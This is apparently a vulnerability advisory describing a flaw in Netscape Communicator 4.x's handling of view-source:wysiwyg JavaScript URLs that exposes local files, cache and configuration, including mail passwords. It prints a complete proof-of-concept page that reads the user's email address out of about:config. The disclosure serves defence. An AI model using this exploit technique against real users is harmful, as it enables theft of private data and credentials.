|
|
|
|
| |
| There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (and probably all 4.x versions) in the way it works with "view-source:wysiwyg://1/javascript" URLs. This security vulnerability exposes Netscape users to malicious attacks. |
| |
Credit:
This vulnerability was found by Georgi Guninski
|
| |
The security problem in Netscape Communicator arises when Communicator tries to parse a "view-source:wysiwyg://1/javascript" URL. While parsing this URL in a "view-source" window, the security context of the JavaScript is elevated to that of the view-source, making it possible for the JavaScript to access sensitive information.
The problem also consists of the fact documents are allowed to be included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find().
This vulnerability allows an attacker to do the following:
* Browse local directories
* Read the user's cache
* Read parsed HTML files
* Read Netscape's configuration ("about:config") including user's email address, mail servers and the mail password.
This vulnerability may be exploited using HTML based email messages.
An easy workaround would be to disable JavaScript.
A demonstration page is available at: http://www.nat.bg/~joro/viewsource.html
The source code for this demonstration follows:
<HTML>
<BODY>
This demonstration tries to find your email address, it may take some time.
<BR><BR>
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>
<HR>
<SCRIPT>
s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv>>"
+"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
+" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"
+"setTimeout(\" "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+" t=res + String.fromCharCode(c);"
+" if (find(t,true,true)) {"
+" res=t;"
+" if (c==32) i=charstoread+1"
+" } "
+" }"
+"}"
+"res=res.substring(mag.length);"
+"alert(msg1 + res);"
+" ;\",3000);</"+"SCRIPT>'";
//a=window.open(s);
location=s;
</SCRIPT>
</BODY>
</HTML>
|
|
|
|
|
|
|
|
|
|
